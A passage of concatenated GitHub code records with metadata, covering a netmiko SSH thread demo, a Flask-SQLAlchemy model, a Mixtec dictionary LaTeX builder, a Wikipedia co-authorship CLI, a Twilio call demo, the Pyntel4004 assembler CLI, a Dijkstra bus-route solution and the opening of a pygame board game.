PROCESSED\")\n","repo_name":"mdsatria/npc_digital_tils","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":10578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37915658917","text":"import time\nfrom concurrent.futures import ThreadPoolExecutor, wait\nfrom datetime import datetime\nfrom netmiko import ConnectHandler\nfrom my_devices import device_list\n\ndef ssh_conn(a_device):\n net_connect = ConnectHandler(**a_device)\n return net_connect.find_prompt()\n\nif __name__ == '__main__':\n start_time = datetime.now()\n max_threads = 4\n\n pool = ThreadPoolExecutor(max_threads)\n\n future_list = []\n for a_device in device_list: \n future = pool.submit(ssh_conn, a_device)\n future_list.append(future)\n \n #wait until all pending threads are done, its similar to join\n wait(future_list)\n\n #creating a loop to fetch the values from the future_list\n for future in future_list:\n print('Result: '+ future.result())\n\n end_time = datetime.now()\n print('\\nTime taken:' + str(end_time - start_time))\n\n","repo_name":"abhinav2938/Kirk_python-course","sub_path":"class_ex/concurrency/thread_wait.py","file_name":"thread_wait.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44563609205","text":"from .db import db\nfrom sqlalchemy.sql import func\n\nclass Watch(db.Model):\n __tablename__ = 'watchs'\n\n id = db.Column(db.Integer, primary_key=True)\n watchlist_id = db.Column(db.Integer, db.ForeignKey('watchlists.id'))\n sneax_id = db.Column(db.Integer, db.ForeignKey('sneaxs.id'))\n created_at = db.Column(db.DateTime(timezone=True), server_default=func.now())\n updated_at = db.Column(db.DateTime(timezone=True), server_default=func.now())\n\n listwatch = db.relationship('Watchlist', back_populates='watch' )\n sneaker = db.relationship('Sneax')\n\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'watchlist_id': self.watchlist_id,\n 'sneax_id': self.sneax_id,\n }\n","repo_name":"Simonvargas/SneaX","sub_path":"app/models/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33757647975","text":"from tkinter import *\r\nimport os\r\nimport subprocess\r\nimport random\r\n\r\nSOURCE = 'MixtecDict'\r\nNAME = 'MixtecDictionary'\r\nFOLDER = 'Dictionary'\r\n\r\nLETTERCOLUMN = 4\r\nPARTOFSPEECHCOLUMN = 5\r\nPRONUNCIATIONCOLUMN = 3\r\n\r\nmaster = Tk()\r\n\r\ndef createFolder(directory):\r\n try:\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n except OSError:\r\n print ('Error: Creating directory. ' + directory)\r\n\r\ndef stringToList(someString):\r\n\t'''string with commas delimiting chunks to list'''\r\n\tresult = []\r\n\titem = ''\r\n\tfor char in someString: \r\n\t\tif char != ',':\r\n\t\t\titem += char\r\n\t\telse: \r\n\t\t\tresult += [item]\r\n\t\t\titem = ''\r\n\tresult += [item] \r\n\treturn result\r\n\r\ndef count(someString,someChars):\r\n\t'''return how many instances of \r\n\tsomeChars there are in someString'''\r\n\tresult = -1\t # start at -1 because there's 1 extra #\r\n\tfor char in someString:\r\n\t\tif char in someChars:\r\n\t\t\tresult += 1\r\n\treturn result \r\n\r\ndef categories(emptyList,listOfLists,column):\r\n\t'''Makes a list of the different categories found in a column'''\r\n\tfor entry in listOfLists:\r\n\t\tcat = entry[column]\r\n\t\tif any(z == cat for z in emptyList): \r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\temptyList += [cat]\r\n\treturn emptyList\r\n\r\nf = open(SOURCE,'r')\r\n'''Makes a list of entries in f, with each entry converted into a list'''\r\nasList = []\r\nfor line in f:\r\n\tentry = stringToList(line)\r\n\tasList += [entry]\r\nf.close()\r\n\r\nLetters = []\r\n'''Makes a list of the different letters each word is categorized under'''\r\ncategories(Letters,asList,LETTERCOLUMN)\r\n\r\npartsOfSpeech = []\r\n'''Makes a list of the different parts of speech each word is categorized under'''\r\ncategories(partsOfSpeech,asList,PARTOFSPEECHCOLUMN)\r\n\r\nselectedPartsSpeech = []\r\n'''Make a list of selected parts of speech'''\r\nnumPartsOfSpeech = 1\r\nfor part in partsOfSpeech:\r\n\tvar = IntVar()\r\n\tcheckIt = Checkbutton(master, text=part, variable=var)\r\n\tcheckIt.grid(row=numPartsOfSpeech, sticky=W)\r\n\tcheckIt.select()\r\n\tselectedPartsSpeech += [var]\r\n\tnumPartsOfSpeech += 1\r\n\r\ndef buildDict():\r\n\tWanted = []\r\n\tnum = 0\r\n\tfor pick in selectedPartsSpeech:\r\n\t\tif pick.get() == 1:\r\n\t\t\tWanted += [partsOfSpeech[num]]\r\n\t\telse:\r\n\t\t\tpass\r\n\t\tnum += 1\r\n\t# makes a list of the desired parts of speech as Wanted\r\n\r\n\tnumOfWords = 0\r\n\r\n\tfor lett in Letters:\r\n\t\tfor entry in asList:\r\n\t\t\tif (entry[LETTERCOLUMN] == lett) and (entry[PARTOFSPEECHCOLUMN] in Wanted):\r\n\t\t\t\tnumOfWords += 1\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\r\n\tcreateFolder('./'+FOLDER+'/')\r\n\t# Creates a folder in the current directory called Dictionary\r\n\t\r\n\tg = open(FOLDER+'/'+NAME+'.tex','w')\r\n\r\n\tg.write('% '+NAME+'.tex\\n')\r\n\tg.write('\\\\documentclass[12pt]{article}\\n')\r\n\tg.write('\\\\usepackage[margin=1in]{geometry}\\n')\r\n\tg.write('\\\\usepackage{palatino}\\n')\r\n\tg.write('\\\\usepackage{setspace} % for line spacing\\n')\r\n\tg.write('\\\\usepackage{booktabs}\\n')\r\n\tg.write('\\\\usepackage{longtable}\\n')\r\n\tg.write('\\\\usepackage{array} % for defining a new column type\\n')\r\n\tg.write('\\n')\r\n\r\n\tg.write('%\\\\renewcommand{\\\\familydefault}{\\\\sfdefault}\\n')\r\n\tg.write('\\n')\r\n\tg.write('\\\\newcolumntype{C}{>{\\\\bf}c}\\n')\r\n\tg.write('\\\\newcolumntype{A}{>{\\\\it}l}\\n')\r\n\tg.write('\\\\newcolumntype{T}{>{--\\ } l}\\n')\r\n\tg.write('\\n')\r\n\r\n\tg.write('\\\\begin{document}\\n')\r\n\tg.write('\\n')\r\n\tg.write('\\\\title{')\r\n\tg.write(\"\\\\underline{tutu t\\\\`u'un s\\\\`av\\\\`i \\\\~nuu$\\\\star$ n\\\\`u\\\\`u$\\\\star$ yuk\\\\`u}\\\\\\\\\\n\")\r\n\tg.write('\\\\underline{Diccionario Mixteco de San Miguel Cuevas}\\\\\\\\\\n')\r\n\tg.write('Cuevas Mixtec Dictionary}\\n')\r\n\tg.write('\\\\author{CBDIO}\\n')\r\n\tg.write('% \\\\date{}\\n')\r\n\tg.write('\\n')\r\n\tg.write('\\\\maketitle\\n')\r\n\tg.write('\\n')\r\n\tg.write('\\\\onehalfspacing\\n')\r\n\tg.write('\\n')\r\n\r\n\tg.write('\\\\begin{center}\\n')\r\n\tg.write('\\\\begin{longtable}{rl}\\n')\r\n\tg.write('\\\\toprule\\n')\r\n\tg.write('\\\\textbf{Selected categories}: & \\\\emph{'+', '.join(Wanted)+'}\\n')\r\n\tg.write('\\\\\\\\\\n')\r\n\tg.write('\\\\textbf{Number of words}: & \\\\emph{'+str(numOfWords)+'}\\n')\r\n\tg.write('\\\\\\\\\\n')\r\n\tg.write('\\\\bottomrule\\n')\r\n\tg.write('\\\\end{longtable}\\n')\r\n\tg.write('\\\\end{center}\\n')\r\n\tg.write('\\n')\t\r\n\r\n\tfor lett in Letters:\r\n\t\tg.write('\\\\section*{'+lett+'}\\n')\r\n\t\tg.write('\\n')\r\n\t\tg.write('\\\\begin{longtable}[l]{CATT}\\n')\r\n\t\tg.write('\\\\toprule\\n')\r\n\t\tfor entry in asList:\r\n\t\t\tif (entry[LETTERCOLUMN] == lett) and (entry[PARTOFSPEECHCOLUMN] in Wanted):\r\n\t\t\t\t# remove second part above for full dictionary\r\n\t\t\t\tg.write(entry[0])\r\n\t\t\t\tfor field in entry[PARTOFSPEECHCOLUMN:]:\r\n\t\t\t\t\tg.write(' & '+field)\r\n\t\t\t\tg.write('\\\\\\\\\\n')\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\tg.write('\\\\bottomrule\\n')\r\n\t\tg.write('\\\\end{longtable}\\n')\r\n\t\tg.write('\\n')\t\r\n\r\n\tg.write('\\\\end{document}'+'\\n')\r\n\r\n\tg.close()\r\n\r\n\tprint('fishihed '+NAME+'.tex')\r\n\r\n\tos.chdir(FOLDER)\r\n\t# Changes directory to Dictionary folder\r\n\tos.system('pdflatex '+NAME+'.tex')\r\n\t# Runs pdflatex on the tex file in dictionary folder\r\n\tsubprocess.Popen(\"%s %s\" % ('C:\\\\Program Files\\\\SumatraPDF\\\\SumatraPDF.exe', NAME+'.pdf'))\r\n\t# Runs pdflatex on the tex file in dictionary folder\r\n\tos.chdir(os.path.dirname(os.getcwd()))\r\n\t# Changes directory back to parent folder of Dictionary folder\r\n\r\n\tprint('building '+NAME+'.pdf now')\r\n\r\nLabel(master, text=\"Desired parts of speech:\").grid(row=0, sticky=W)\r\n\r\nButton(master, text='Build', command=buildDict).grid(row=numPartsOfSpeech+1, sticky=W, pady=4)\r\n\r\nButton(master, text='Quit', command=master.quit).grid(row=numPartsOfSpeech+2, sticky=W, pady=4)\r\n\r\nmainloop()","repo_name":"uchicagolinguist/mixtec","sub_path":"SelectPartsSpeech.py","file_name":"SelectPartsSpeech.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9205065715","text":"#!/usr/bin/env python3\n\nimport argparse\nimport Importer\nimport Analyzer\nimport Processor\nimport Exporter\nimport create_db\n\n\ndef main():\n # create the top-level parser\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(\n title='possible subcommands', dest='command')\n subparsers.required = True\n\n # create the parser for the create command\n parser_create = subparsers.add_parser(\n 'create', help='Creates the database for wacot.')\n parser_create.set_defaults(func=wacot_create)\n\n # create the parser for the import command\n parser_import = subparsers.add_parser(\n 'import', help='Imports the data from the wikipedia dump.')\n parser_import.add_argument(\n '--from-dumps', choices=['xml', 'cat', 'all'],\n help=('Select from which dump files to import: '\n 'xml imports only from the XML dump, '\n 'cat imports only from the category and categorylink SQL files '\n 'and all imports from both. Default is all.'))\n parser_import.add_argument(\n '--only-import', action=\"store_true\",\n help=('Only imports the data but does not analyze it. '\n 'By default the data is analyzed after the import.'))\n parser_import.set_defaults(func=wacot_import, from_dumps='all')\n\n # create the parser for the analyze command\n parser_analyze = subparsers.add_parser(\n 'analyze', help=('Analyzes the data and computes the '\n 'contribution tables, bot flags, '\n 'contribution counts and edit_counts.'))\n parser_analyze.set_defaults(func=wacot_analyze)\n\n # create the parser for the process command\n parser_process = subparsers.add_parser(\n 'process', help='Processes the data to generate co-authorship tables.')\n parser_process.add_argument(\n 'object', choices=['article-similarities', 'category-similarities'],\n help=('Select if you want to compute co-authorship '\n 'for articles or categories'))\n parser_process.set_defaults(func=wacot_process)\n\n # create the parser for the export command\n parser_export = subparsers.add_parser(\n 'export', help='Creates the database for wacot.')\n parser_export.add_argument(\n 'object', choices=['article-similarities', 'category-similarities'],\n help=('Select if you want to export similarities '\n 'for articles or categories'))\n parser_export.add_argument(\n '--format', choices=['graphml', 'csv'],\n help='Select export format. Default is graphml.')\n parser_export.set_defaults(func=wacot_export, format='graphml')\n\n # parse the args and call the function for the selected command\n args = parser.parse_args()\n args.func(args)\n\n\ndef wacot_create(args):\n create_db.main()\n\n\ndef wacot_import(args):\n importer = Importer.Importer()\n if args.from_dumps == 'all' or args.from_dumps == 'xml':\n importer.import_xml()\n if args.from_dumps == 'all' or args.from_dumps == 'cat':\n importer.import_categories()\n if not args.only_import:\n analyzer = Analyzer.Analyzer()\n analyzer.compute_article_contributions()\n analyzer.compute_category_contributions()\n analyzer.compute_bot_flags()\n analyzer.count_article_contributions()\n analyzer.count_category_contributions()\n\n\ndef wacot_analyze(args):\n analyzer = Analyzer.Analyzer()\n analyzer.compute_article_contributions()\n analyzer.compute_category_contributions()\n analyzer.compute_bot_flags()\n analyzer.count_article_contributions()\n analyzer.count_category_contributions()\n\n\ndef wacot_process(args):\n processor = Processor.Processor()\n if args.object == 'article-similarities':\n processor.generate_article_co_authorship()\n elif args.object == 'category-similarities':\n processor.generate_category_co_authorship()\n\n\ndef wacot_export(args):\n exporter = Exporter.Exporter()\n if args.object == 'article-similarities':\n if args.format == 'graphml':\n exporter.export_article_similarities_to_graphml()\n elif args.format == 'csv':\n exporter.export_article_similarities_to_graphml()\n elif args.object == 'category-similarities':\n if args.format == 'graphml':\n exporter.export_category_similarities_to_graphml()\n elif args.format == 'csv':\n exporter.export_category_similarities_to_graphml()\n\n\nif (__name__ == \"__main__\"):\n main()\n","repo_name":"StefanoWoerner/wacot","sub_path":"wacot.py","file_name":"wacot.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73571015847","text":"import os\nfrom twilio.rest import Client\naccount_sid = os.environ['TWILIO_ACCOUNT_SID']\nauth_token = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\ncall = client.calls.create(\n twiml='AUTO WARRANTY INSURANCE',\n to=os.environ['MY_PHONE_NUMBER'], \n from_='+12672042695'\n )\n\nprint(call.sid)\n","repo_name":"elizabethsiegle/twilio-101-sms-voice-workshop","sub_path":"outbound-call.py","file_name":"outbound-call.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"6303077515","text":"# Import system libraries\nimport os\nimport sys\n\n# Import resources library (part of setuptools)\nimport pkg_resources\n\n# Import toml library\nimport toml\nfrom toml import TomlDecodeError\n\n# Import click library\nimport click\n\n# Import Pyntel4004 functionality\nfrom assembler.assemble import assemble\nfrom disassembler.disassemble import disassemble\nfrom executer.execute import execute\nfrom executer.exe_supporting import retrieve\nfrom hardware.processor import Processor\nfrom shared.shared import print_messages\n\n\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n\n\nclass CoreNotInstalled(Error):\n \"\"\"Exception for when Pyntel4004 is not installed\"\"\"\n\n\nclass ConfigFileNotFound(Error):\n \"\"\"Exception for when the configuration file specified cannot be found\"\"\"\n\n\nclass BadFormat(Error):\n \"\"\"Exception for when the configuration file is badly formatted\"\"\"\n\n\ndef excepthook(exc, value, traceback):\n print(value)\n\n\ndef check_quiet(quiet, configuration):\n if quiet is None:\n if \"quiet\" in configuration:\n quiet = configuration[\"quiet\"]\n else:\n quiet = False\n else:\n quiet = True\n return quiet\n\n\ndef check_exec(exec, configuration):\n if exec is None:\n if \"exec\" in configuration:\n exec = configuration[\"exec\"]\n else:\n exec = False\n else:\n exec = True\n return exec\n\n\ndef check_inst(inst):\n if inst is None:\n inst = 4096\n else:\n if inst < 1 or inst > 4096:\n raise click.BadOptionUsage(\"--inst\", \"Instructions should be\" +\n \"between 1 and 4096\")\n return inst\n\n\ndef check_monitor(monitor, configuration):\n if monitor is None:\n if \"monitor\" in configuration:\n monitor = configuration[\"monitor\"]\n else:\n monitor = False\n else:\n monitor = True\n return monitor\n\n\ndef check_dis_content(configuration, object, inst, labels):\n if \"object\" in configuration and object is None:\n object_file = configuration[\"object\"]\n if object_file is None:\n raise click.BadOptionUsage(\n \"--object/--config\", \"No object file specified\\n\")\n if \"inst\" in configuration and inst is None:\n inst = configuration[\"inst\"]\n if labels is False and \"labels\" in configuration:\n labels = configuration[\"labels\"]\n else:\n labels = True\n return object_file, inst, labels\n\n\ndef check_asm_content(configuration, input_file, output, type_type):\n if \"input\" in configuration and input_file is None:\n input_file = configuration[\"input\"]\n if \"output\" in configuration and output == 'default':\n output = configuration[\"output\"]\n if \"type\" in configuration and type_type == ('None',):\n type_type = configuration[\"type\"]\n if input_file is None and output == 'default' \\\n and type_type == ('None',):\n raise click.BadOptionUsage(\n \"--config\", \"Empty 'asm' section in configuration file\\n\")\n return input_file, output, type_type\n\n\ndef check_type(type_type):\n # Check --type parameters\n # Raise error if not valid\n good = True\n all_found = False\n for i in type_type:\n if i.upper() in ('ALL', ):\n all_found = True\n if i.upper() not in ('ALL', 'OBJ', 'H', 'BIN'):\n good = False\n if good is False:\n raise click.BadOptionUsage(\"--type\", \"Invalid output type specified\\n\")\n\n # Check --type parameters - ALL cannot be specified with others\n # Raise error if not valid\n if all_found:\n others = True\n for i in type_type:\n if i.upper() in ('OBJ', 'H', 'BIN'):\n others = False\n if others is False:\n raise click.BadOptionUsage(\"--type\", \"Cannot specify 'ALL' \" +\n \"with any others\\n\")\n\n\ndef getcoreversion():\n __core_version__ = 'Installed'\n try:\n __core_version__ = pkg_resources.require(core_name)[0].version\n except CoreNotInstalled:\n __core_version__ = 'Not Installed'\n else:\n __core_version__ = 'Installed but no legal version'\n return __core_version__\n\n\npackage = \"Pyntel4004-cli\"\ncore_name = 'Pyntel4004'\ncini = '\\n\\n' + core_name + ' core is not installed - use \\n\\n' + \\\n ' pip install ' + core_name + '\\n'\nmodule = os.path.basename(sys.argv[0])\n__version__ = pkg_resources.require(package)[0].version\n__core_version__ = getcoreversion()\nsys.excepthook = excepthook\n\n\n# ----------- Utility Functionality ----------- #\n\ndef get_config(toml_file: str):\n \"\"\"\n Retrieve a configuration file\n\n Parameters\n ----------\n toml_file: str, mandatory\n Name of the configuration file\n\n Returns\n -------\n configuration: str\n String containing the configuration data\n\n Raises\n ------\n ConfigFileNotFound - the file cannot be opened\n BadFormat - The configuration file is badly formatted TOML\n\n Notes\n -----\n N/A\n\n \"\"\"\n configuration = None\n try:\n _ = open(toml_file)\n except OSError as e:\n if str(e.strerror[0:12]) == 'No such file':\n raise ConfigFileNotFound('Error:Configuration file not found.')\n try:\n configuration = toml.load(toml_file)\n except (TypeError, TomlDecodeError):\n raise BadFormat('Badly formatted configuration file')\n return configuration\n\n\n# ----------- Check Functionality ----------- #\n\n\ndef is_core_installed(package_name: str):\n \"\"\"\n Check to see if the Pyntel4004 core is installed\n\n Parameters\n ----------\n package_name: str, mandatory\n Name of the Pyntel4004 core package\n\n Returns\n -------\n True - if the core package is installed\n False - if not\n\n Raises\n ------\n N/A\n\n Notes\n -----\n N/A\n\n \"\"\"\n import importlib.util\n spec = importlib.util.find_spec(package_name)\n if spec is None:\n return False\n else:\n return True\n\n\n# ----------- Main Functionality ----------- #\n\n\n@click.group()\n@click.help_option('--help', '-h')\n@click.version_option(__version__, '--version', '-v',\n prog_name=package + ' (' + module + ')',\n message='%(prog)s, Version %(version)s \\n' + core_name +\n ' ' + 'Version: ' + __core_version__ + '\\n' +\n 'Learn more at https://github.com/alshapton/Pyntel4004')\n@click.pass_context\ndef cli(ctx):\n '''\n Command Line Interface (CLI) for Pyntel4004,\n a virtual Intel© 4004 processor written in Python.\n\n Learn more at https://github.com/alshapton/Pyntel4004\n '''\n pass\n\n\n@cli.command()\n@click.option('--input', '-i',\n help='4004 assembler source code.',\n type=str, metavar='')\n@click.option('--output', '-o',\n help='4004 output file (without extension).', default='default',\n metavar='')\n@click.option('--exec', '-x', is_flag=True, help='Execute program',\n default=None)\n@click.option('--quiet', '-q', is_flag=True, default=None,\n help='Output on/off [either/or ]')\n@click.option('--monitor', '-m', is_flag=True, default=None,\n help='Monitor on/off [but not both]')\n@click.option('--type', '-t', multiple=True, default=['None'],\n metavar='',\n help='Multiple output types can be specified - bin/obj/h/ALL')\n@click.option('--config', '-c', metavar='',\n help='Configuration file', default=None)\n@click.help_option('--help', '-h')\ndef asm(input, output, exec, monitor, quiet, type, config):\n \"\"\"Assemble the input file\"\"\"\n # Eliminate the \"Shadowing\" of builtins\n input_file = input\n type_type = type\n\n # Ensure that the core Pyntel4004 is installed\n # Exit if not\n if not is_core_installed(core_name):\n raise CoreNotInstalled(cini)\n # Get configuration (override from command line if required)\n if config is not None:\n configuration = get_config(config)\n if \"asm\" in configuration:\n asm_configuration = configuration[\"asm\"]\n input_file, output, type_type = \\\n check_asm_content(asm_configuration, input_file,\n output, type_type)\n exec = check_exec(exec, asm_configuration)\n monitor = check_monitor(monitor, asm_configuration)\n quiet = check_quiet(quiet, asm_configuration)\n else:\n raise click.BadOptionUsage(\n \"--config\", \"No 'asm' section in configuration file\\n\")\n\n # Create new instance of a processor\n chip = Processor()\n # Check exclusiveness of parameters\n # Raise an error if not allowed\n if quiet and monitor:\n raise click.BadParameter(\"Invalid Parameter Combination: \" +\n \"--quiet and --monitor cannot be used \" +\n \"together\\n\")\n # Check existence of --type parameter\n # Raise error if not present\n if type_type == ('None',):\n raise click.BadOptionUsage(\"--type\", \"No output type specified\\n\")\n check_type(type_type)\n result = assemble(input_file, output, chip, quiet, str(type_type))\n if result and exec:\n print_messages(quiet, 'EXEC', chip, '')\n did_execute = execute(chip, 'rom', 0, monitor, quiet)\n if did_execute:\n print_messages(quiet, 'BLANK', chip, '')\n print_messages(quiet, 'ACC', chip, '')\n print_messages(quiet, 'CARRY', chip, '')\n print_messages(quiet, 'BLANK', chip, '')\n\n\n@cli.command()\n@click.option('--object', '-o',\n help='4004 object or binary file (specify extension)',\n metavar='', type=str)\n@click.option('--inst', '-i',\n help='Instuctions to disassemble',\n metavar='',\n type=int)\n@click.option('--labels', '-l',\n help='Show label table',\n is_flag=True, default=False)\n@click.option('--config', '-c', metavar='',\n help='Configuration file', default=None)\n@click.help_option('--help', '-h')\ndef dis(object, inst, labels, config) -> None:\n \"\"\"Disassemble the input file\"\"\"\n # Ensure that the core Pyntel4004 is installed\n # Exit if not\n if not is_core_installed(core_name):\n raise CoreNotInstalled(cini)\n object_file = object\n if config is not None:\n configuration = get_config(config)\n if \"dis\" in configuration:\n dis_configuration = configuration[\"dis\"]\n object_file, inst, labels = check_dis_content(dis_configuration,\n object, inst, labels)\n else:\n raise click.BadOptionUsage(\n \"--config\", \"No 'dis' section in configuration file\\n\")\n inst = check_inst(inst)\n # Create new instance of a processor\n chip = Processor()\n memory_space, _, lbls = retrieve(object_file, chip, False)\n disassemble(chip, memory_space, 0, inst, labels, lbls)\n\n\n@cli.command()\n@click.option('--object', '-o',\n help='4004 object or binary file (specify extension)',\n metavar='', type=str)\n@click.option('--quiet', '-q', is_flag=True,\n help='Output on/off')\n@click.option('--config', '-c', metavar='',\n help='Configuration file', default=None)\n@click.help_option('--help', '-h')\ndef exe(object, quiet, config):\n \"\"\"Execute the object file\"\"\"\n # Ensure that the core Pyntel4004 is installed\n # Exit if not\n if not is_core_installed(core_name):\n raise CoreNotInstalled(cini)\n if config is not None:\n configuration = get_config(config)\n object_file = object\n if \"exe\" in configuration:\n exe_configuration = configuration[\"exe\"]\n if \"object\" in exe_configuration and object_file is None:\n object_file = exe_configuration[\"object\"]\n quiet = check_quiet(quiet, exe_configuration)\n\n else:\n raise click.BadOptionUsage(\n \"--config\", \"No 'exe' section in configuration file\\n\")\n\n # Create new instance of a processor\n chip = Processor()\n result = retrieve(object_file, chip, quiet)\n memory_space = result[0]\n execute(chip, memory_space, 0, False, quiet)\n","repo_name":"alshapton/Pyntel4004-cli","sub_path":"4004cli.py","file_name":"4004cli.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2338092791","text":"# 문제: n(1≤n≤1,000)개의 도시가 있다. 그리고 한 도시에서 출발하여 다른 도시에 도착하는 m(1≤m≤100,000)개의 버스가 있다. 우리는 A번째 도시에서 B번째 도시까지 가는데 드는 버스 비용을 최소화 시키려고 한다. 그러면 A번째 도시에서 B번째 도시 까지 가는데 드는 최소비용과 경로를 출력하여라.\n# 항상 시작점에서 도착점으로의 경로가 존재한다.\n\n# 입력: 첫째 줄에 도시의 개수 n(1≤n≤1,000)이 주어지고 둘째 줄에는 버스의 개수 m(1≤m≤100,000)이 주어진다. 그리고 셋째 줄부터 m+2줄까지 다음과 같은 버스의 정보가 주어진다. 먼저 처음에는 그 버스의 출발 도시의 번호가 주어진다. 그리고 그 다음에는 도착지의 도시 번호가 주어지고 또 그 버스 비용이 주어진다.\n# # 버스 비용은 0보다 크거나 같고, 100,000보다 작은 정수이다.\n# 그리고 m+3째 줄에는 우리가 구하고자 하는 구간 출발점의 도시번호와 도착점의 도시번호가 주어진다.\n\n# 출력: 첫째 줄에 출발 도시에서 도착 도시까지 가는데 드는 최소 비용을 출력한다.\n# 둘째 줄에는 그러한 최소 비용을 갖는 경로에 포함되어있는 도시의 개수를 출력한다. 출발 도시와 도착 도시도 포함한다.\n# 셋째 줄에는 최소 비용을 갖는 경로를 방문하는 도시 순서대로 출력한다.\n\nimport sys\nimport heapq\n\nn = int(sys.stdin.readline())\nm = int(sys.stdin.readline())\n\n# 버스 정류장과 각 도착지로의 비용을 저장해주는 dictionary\nbus_station = dict()\n\n# 버스 정류장 출발점 초기화\nfor i in range(n):\n bus_station[str(i)] = dict()\n\n# 출발지, 도착지, 비용을 받아서 bus_station에 저장해줌\nfor _ in range(m):\n From, End, Weight = map(int, sys.stdin.readline().split())\n\n if(str(End-1) in bus_station[str(From-1)]):\n bus_station[str(From-1)][str(End-1)\n ] = min(bus_station[str(From-1)][str(End-1)], Weight)\n else:\n bus_station[str(From-1)][str(End-1)] = Weight\n\n# 출발지점과 도착지점\nstart, end = map(int, sys.stdin.readline().split())\n\n# 도착지까지의 최소비용을 저장해주는 list\ncost = [sys.maxsize]*n\ncost[start-1] = 0\n# 도착지까지 최소비용으로 가게 해주는 루트를 저장해주는 list\nroute = [[start-1] for _ in range(n)]\n\n# 우선순위 큐 생성\nqueue = []\nheapq.heappush(queue, [start-1, cost[start-1], route[start-1]])\n\nwhile(queue):\n cur_station, cur_cost, cur_route = heapq.heappop(queue)\n\n if(cost[cur_station] < cur_cost):\n continue\n\n for adj, adj_cost in bus_station[str(cur_station)].items():\n c = cur_cost + adj_cost\n\n # c가 기존의 저장되어있는 비용보다 작으면 cost와 route를 최신화 해주고 우선순위 큐에 넣어준다.\n if(c < cost[int(adj)]):\n cost[int(adj)] = c\n route[int(adj)] = cur_route + [int(adj)]\n heapq.heappush(queue, [int(adj), cost[int(adj)], route[int(adj)]])\n\n# 최소 비용\nprint(cost[end-1])\n# 최소 비용으로 가는데 거치는 정류장 수\nprint(len(route[end-1]))\n# 최소 비용으로 가는 정류장을 순서대로 풀력\nfor i in route[end-1]:\n print(i+1, end=' ')\n","repo_name":"97DongHyeokOH/Algorithm_Study","sub_path":"BAEKJOON/Practice/다익스트라/11779.py","file_name":"11779.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74235451688","text":"import sys\n\nimport pygame\n\nfrom NineMensMorris_version7 import Game_Functions as Game_Functions\n\nDEBUG = True\n# Global Variables\nboard = Game_Functions()\npygame.font.init() # you have to call this at the start, \n # if you want to use this module.\nmyfont = pygame.font.SysFont('Arial', 18)\n# Print the positions, player turn, active mills, remaining turns, and permissible moves\nprint(\"Positions:\", board.get_positions())\nprint(\"Player Turn:\", board.get_player_turn())\nprint(\"Active Mills:\", board.get_active_mills())\nprint(\"Remaining Turns:\", board.get_remaining_turns())\nprint(\"Permissible Moves:\", board.get_permissible_moves())\n\n# Initialize pygame\nprint(\" calling pygame.init()\")\npygame.init()\nprint(\"pygame initialized\")\n# Set the size of the screen\nscreen = pygame.display.set_mode((600, 750))\n\npygame.display.set_caption(\"Nine Men Morris\")\nprint(\"game window initialized\")\n# nine mens morris board image \nboardImg = pygame.image.load('morrisbig.png') \n# avatar images\nleafImg = pygame.image.load('player1_30x30.png')\nfireImg = pygame.image.load('player2_30x30.png')\nhighImg = pygame.image.load('high.png')\nroboImg = pygame.image.load('robo1.png')\n# coordinates of each board position in Board and corresponding position in the nine mens morris board image\nprint(\"images loaded\")\ncoords = {\n 0: (22, 22, 120, 770),\n 1: (230, 22, 820, 770),\n 2: (450, 22, 230, 660),\n 3: (22, 240, 710, 660),\n 4: (450, 240, 350, 540),\n 5: (22, 450, 590, 540),\n 6: (230, 450, 120, 425),\n 7: (450, 450, 230, 425),\n 8: (95, 95, 350, 425),\n 9: (230, 95, 590, 425),\n 10: (380, 95, 710, 425),\n 11: (95, 240, 820, 425),\n 12: (380, 240, 350, 310),\n 13: (95, 378, 470, 310),\n 14: (230, 378, 590, 310),\n 15: (380, 378, 230, 190),\n 16: (162, 169, 470, 190),\n 17: (230, 169, 710, 190),\n 18: (308, 169, 120, 80),\n 19: (162, 240, 470, 80),\n 20: (308, 240, 820, 80),\n 21: (162, 308, 415, 790),\n 22: (230, 308, 430, 680),\n 23: (308, 308, 430, 575)\n}\n# coordinates of each clickable position\n# mul = 500 / 843\n# clickables = [pygame.Rect(mul * c[0], mul * c[1], 35, 35) for c in coords.values()]\nclickables = [pygame.Rect(c[0], c[1], 30, 30) for c in coords.values()]\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\n\n# Functions to draw the game state\ndef draw_board(screen, board_img, positions, coords):\n try:\n # Draw the background board\n screen.blit(board_img.convert(), (0, 0))\n # Draw boarders around the clickable areas\n if DEBUG:\n for rect in clickables:\n pygame.draw.rect(screen, BLACK, rect, 1)\n \n # Draw the pieces on the board\n for pos, value in enumerate(positions):\n x, y, _, _ = coords[pos]\n if value == 1:\n screen.blit(leafImg.convert_alpha(), (x, y))\n elif value == 2:\n screen.blit(fireImg.convert_alpha(), (x, y))\n except Exception as e:\n print(f\"Error drawing 